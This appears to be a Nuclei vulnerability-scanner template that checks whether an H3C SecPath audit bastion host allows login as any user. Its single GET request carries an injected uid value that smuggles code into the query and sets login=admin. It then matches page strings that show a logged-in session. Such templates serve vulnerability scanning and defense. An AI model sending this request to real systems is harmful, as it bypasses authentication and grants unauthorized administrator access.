id: H3C-SecPath-unauth

info:
  name: H3C-SecPath-运维审计系统(堡垒机)任意用户登录
  author: Str1am
  severity: medium
  tags: SecPath,login

requests:
  - method: GET
    path:
      - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "profile_view.php"
          - "index.php?locale="
        part: body
        condition: and